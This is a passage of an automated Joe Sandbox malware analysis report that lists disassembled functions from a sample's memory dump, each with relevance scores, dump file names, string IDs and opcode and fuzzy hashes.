                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6
                                                                                                                      • API String ID: 0-498629140
                                                                                                                      • Opcode ID: 29062a0a7bed856864adecc04a51b955c47ac0abe8328cbd8e4662ade0057f73
                                                                                                                      • Instruction ID: bc9bdf3dd3bfe5164202980cecc97844da644d14ecb4fb3d4d0d9e28e5a5809f
                                                                                                                      • Opcode Fuzzy Hash: 29062a0a7bed856864adecc04a51b955c47ac0abe8328cbd8e4662ade0057f73
                                                                                                                      • Instruction Fuzzy Hash: 7D322DB0405B819FD351DF39C445793BFE0AB16214F188A9EE4E9CB383D236E156CBA6
                                                                                                                      Function 005039EB Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: yR
                                                                                                                      • API String ID: 0-2678679291
                                                                                                                      • Opcode ID: d2c37d53bf4855bfca2f374ed73ae8e6f8254fe1df28a746d15e69d21d2b1e2b
                                                                                                                      • Instruction ID: 43eec31b8c60294e6fbb8c17aa6b6f176cc4552f240d955d7456fc2458bcfc17
                                                                                                                      • Opcode Fuzzy Hash: d2c37d53bf4855bfca2f374ed73ae8e6f8254fe1df28a746d15e69d21d2b1e2b
                                                                                                                      • Instruction Fuzzy Hash: 88322951508BC28DD326CB7C8848359BF912B67228F1C87DDD1E94F3D3D2AA8587C7A6
                                                                                                                      Function 00506010 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 596dd88bc2eca2cccf4105fad475ddec7cdecb4c1ea99b48759a5e90ce1601f9
                                                                                                                      • Instruction ID: 8e368f8e86fd40e538241fc3dfc7c95d5f05053d147ca1b6ac51a674906085e8
                                                                                                                      • Opcode Fuzzy Hash: 596dd88bc2eca2cccf4105fad475ddec7cdecb4c1ea99b48759a5e90ce1601f9
                                                                                                                      • Instruction Fuzzy Hash: D561E1716083849FE720CF65D845BEFB7B1BF9A308F10896CE1589B282DB7555068B86
                                                                                                                      Function 0051DF60 Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NP,?
                                                                                                                      • API String ID: 0-3110377521
                                                                                                                      • Opcode ID: 9924b9d9aef95bf2d0ef2e3398baf28cb9a386e5e92e7a9043083584d9d843d6
                                                                                                                      • Instruction ID: f26331bbc0c2c1bf4a1cb89eecf8ae0e59ca851d2aae2e783b86a967fc0f2f4b
                                                                                                                      • Opcode Fuzzy Hash: 9924b9d9aef95bf2d0ef2e3398baf28cb9a386e5e92e7a9043083584d9d843d6
                                                                                                                      • Instruction Fuzzy Hash: 38A137356042119BE324DF14DC86BABBB96FFC5324F148A2CE9A9472D2D731AC86C791
                                                                                                                      Function 004F4C30 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "PO
                                                                                                                      • API String ID: 0-2555398857
                                                                                                                      • Opcode ID: 97411bd4b1f50c47a12ff31343dd6e445ec79ebcf825e8885c8482ee2729a448
                                                                                                                      • Instruction ID: 6928b2c10bd49b377f2e0482765e4400a541315121d133f3d14b193fbdddc247
                                                                                                                      • Opcode Fuzzy Hash: 97411bd4b1f50c47a12ff31343dd6e445ec79ebcf825e8885c8482ee2729a448
                                                                                                                      • Instruction Fuzzy Hash: DFA101715183158BD7189F28D8A277BB3E1EFD2310F09892EE9C58B390EB7C9905C796
                                                                                                                      Function 00510F54 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: b82843be1aac52d477820bf8d28a708450adf6854ac41b230117720700725faa
                                                                                                                      • Instruction ID: 6a1376804efcec6470a7d5076730ee283b85d9696a8e6b63ac22d505b5f24a5c
                                                                                                                      • Opcode Fuzzy Hash: b82843be1aac52d477820bf8d28a708450adf6854ac41b230117720700725faa
                                                                                                                      • Instruction Fuzzy Hash: AE31E43691C3908BE3348F358C553EBBFE2ABD6314F19865CD8D857285DB76084ACB81
                                                                                                                      Function 00510F4E Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 1a954697c8f4ffc04b2e2c8cdef1ed259ab9b4b289e61e701b5aa03be7a1f31f
                                                                                                                      • Instruction ID: 85ef0c3405f736fdb9f07ea0b3b85a09cff0af9a9765b18443fa737885148b9e
                                                                                                                      • Opcode Fuzzy Hash: 1a954697c8f4ffc04b2e2c8cdef1ed259ab9b4b289e61e701b5aa03be7a1f31f
                                                                                                                      • Instruction Fuzzy Hash: BF31C1369583A08BE3348F359C563DBBBE2BBC6314F19861CC8D857285DB761846CB81
                                                                                                                      Function 004E85B0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .
                                                                                                                      • API String ID: 0-248832578
                                                                                                                      • Opcode ID: 3fd286c31c27fc4fc416facfd96adb606158bb133a4c5cbdf4c3a4b68f2b3b2e
                                                                                                                      • Instruction ID: 3221d0c4aee1e1d0c9ecfe6ed0382a6f12b9cd60720a21129dda9be4c8a05a91
                                                                                                                      • Opcode Fuzzy Hash: 3fd286c31c27fc4fc416facfd96adb606158bb133a4c5cbdf4c3a4b68f2b3b2e
                                                                                                                      • Instruction Fuzzy Hash: 9AA14C72E083A14BCF119F29C88035BBBE1BB85311F658A5EDCD8A7395DB389C458BC5
                                                                                                                      Function 00524C20 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Y\]R
                                                                                                                      • API String ID: 2994545307-2023185185
                                                                                                                      • Opcode ID: 5486351bfe2d8a738430e6e4f70d63b07aceec50370a5e2f558f6e917af621f4
                                                                                                                      • Instruction ID: 0ec8e231e1f8cf7ef845b02905f1ef3cf99f02893c2f065ba2efddad930a18e3
                                                                                                                      • Opcode Fuzzy Hash: 5486351bfe2d8a738430e6e4f70d63b07aceec50370a5e2f558f6e917af621f4
                                                                                                                      • Instruction Fuzzy Hash: F391D2716093218BD314DF28E89476BBBE2FFD6314F18862CE895573D1DB759C098B82
                                                                                                                      Function 0051B410 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <
                                                                                                                      • API String ID: 0-4251816714
                                                                                                                      • Opcode ID: 2d1948cad94f7e28ab8f0dc683d472396f1c8ef9b79bc51e32cbcef4ed24d1e2
                                                                                                                      • Instruction ID: 5245895c2d408c221651b6e21502d8dea07cf9c5b23a84ce2845d25207b69269
                                                                                                                      • Opcode Fuzzy Hash: 2d1948cad94f7e28ab8f0dc683d472396f1c8ef9b79bc51e32cbcef4ed24d1e2
                                                                                                                      • Instruction Fuzzy Hash: D8D1AF215087D28EE726CB3C8844359BFA17B67224F0D87D8D0E95F3D3C3659986C7A6
                                                                                                                      Function 004FBA52 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: x(m.
                                                                                                                      • API String ID: 0-3038009362
                                                                                                                      • Opcode ID: 050525d6f1787ba10ae98ec00d8f231de803cbf3ab6e62a1735a32268af4d625
                                                                                                                      • Instruction ID: 7a81d8a7d561f302efd1217ee2394d339b1fc92c5c235347749d246449b5a7ed
                                                                                                                      • Opcode Fuzzy Hash: 050525d6f1787ba10ae98ec00d8f231de803cbf3ab6e62a1735a32268af4d625
                                                                                                                      • Instruction Fuzzy Hash: 337113B2A083548BD3248F25C8A0377B7E1EFE6314F195A1DE9C65B391E7788805C7D6
                                                                                                                      Function 004E6120 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,
                                                                                                                      • API String ID: 0-3772416878
                                                                                                                      • Opcode ID: 4e4cdd11613485ebd3507b31ac98323400b255591d2e2a7447f694ccaad8bd43
                                                                                                                      • Instruction ID: 2df7288f85ee88a558e820e2a86df60ac5b0a40ea7f5086d2b1452b10e90c0c3
                                                                                                                      • Opcode Fuzzy Hash: 4e4cdd11613485ebd3507b31ac98323400b255591d2e2a7447f694ccaad8bd43
                                                                                                                      • Instruction Fuzzy Hash: 5AB139711083819FC325CF19C88061BFBE0AFA9704F444E6DE5D997782D635E918CB67
                                                                                                                      Function 00524950 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: qVol
                                                                                                                      • API String ID: 0-1016533244
                                                                                                                      • Opcode ID: 8b3ced13153849996e397830bc830a781ca8cfe1ea55d45ee5fa764d7b633168
                                                                                                                      • Instruction ID: 886f5a8f72d0727b93b407e40bf60e0b2599fc64748fe1135c9bd7bc4ee1572c
                                                                                                                      • Opcode Fuzzy Hash: 8b3ced13153849996e397830bc830a781ca8cfe1ea55d45ee5fa764d7b633168
                                                                                                                      • Instruction Fuzzy Hash: 8E81C0356083158BCB24DF28E890B6ABBE2FF86354F15852CE9958B3E1E731EC55CB41
                                                                                                                      Function 004F80F0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: gfff
                                                                                                                      • API String ID: 0-1553575800
                                                                                                                      • Opcode ID: cb495a0a3a49e441975428eaecdd02da9d0d80051bb7889fc41cec9e50a565f2
                                                                                                                      • Instruction ID: e641c9c70f7681cc3190d8d08e45b5aac56772b625b9d31eeec150cab96f4fae
                                                                                                                      • Opcode Fuzzy Hash: cb495a0a3a49e441975428eaecdd02da9d0d80051bb7889fc41cec9e50a565f2
                                                                                                                      • Instruction Fuzzy Hash: 39911771A082468FC714CB19C49167BFBD29FD5304F188A2EE5D9CB352EA39DC45CB86
                                                                                                                      Function 0050AFB0 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: q
                                                                                                                      • API String ID: 0-3900047139
                                                                                                                      • Opcode ID: 7a52aa1faa8922f66af51388a69409c7a9e35028d3f0a65613c4a8d6bc734364
                                                                                                                      • Instruction ID: 535201721a0e8079dedbf897194bf65397f21edd16f37b1830b796b37e745cf6
                                                                                                                      • Opcode Fuzzy Hash: 7a52aa1faa8922f66af51388a69409c7a9e35028d3f0a65613c4a8d6bc734364
                                                                                                                      • Instruction Fuzzy Hash: 7A5103B4508301CBDB20DF24D89176BB7F1FF92314F14496CE5858B2A1EB359916CB83
                                                                                                                      Function 004FD8B0 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >
                                                                                                                      • API String ID: 0-325317158
                                                                                                                      • Opcode ID: 569fe6fe8b3fa878c98fa9e6e349a5549a20a7e9ed8f6c33989adf43977665d5
                                                                                                                      • Instruction ID: 70469f6c3384d3a5711b27cb4ae36c321364e99a90fd59f74493108803a38cc8
                                                                                                                      • Opcode Fuzzy Hash: 569fe6fe8b3fa878c98fa9e6e349a5549a20a7e9ed8f6c33989adf43977665d5
                                                                                                                      • Instruction Fuzzy Hash: 15610723E4D6D44BD325893C4C613BA6E934FA7230F2D87AAE6F5873E1D15D8C069345
                                                                                                                      Function 004F8492 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 55a13c94abd96a0188bd3b81811975195d2e5b7122b4998f1652fb89c3317440
                                                                                                                      • Instruction ID: 3c47889ce3248b1cd82fbe749dc6fd9c2ea0e99337468406e13083284a0b98ab
                                                                                                                      • Opcode Fuzzy Hash: 55a13c94abd96a0188bd3b81811975195d2e5b7122b4998f1652fb89c3317440
                                                                                                                      • Instruction Fuzzy Hash: 2151C270508380DFDB319F24D8597ABB7A5FFA2314F08096DE1C98B2A1EB398519CB57
                                                                                                                      Function 004ED172 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 301V
                                                                                                                      • API String ID: 0-2749669040
                                                                                                                      • Opcode ID: 7809f3342f68256dceeb61221405a0cd6a84826d318e3e624cf49d1548532897
                                                                                                                      • Instruction ID: 659c4e01ed37d5cf5ac2588b09e60e6438b06dda677d51ba650cd0aa187f362b
                                                                                                                      • Opcode Fuzzy Hash: 7809f3342f68256dceeb61221405a0cd6a84826d318e3e624cf49d1548532897
                                                                                                                      • Instruction Fuzzy Hash: B341AA746483118BD724DF64C8A4B6BBBF1FF85308F08891DE5864B395E3B98608DB86
                                                                                                                      Function 00522DCA Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
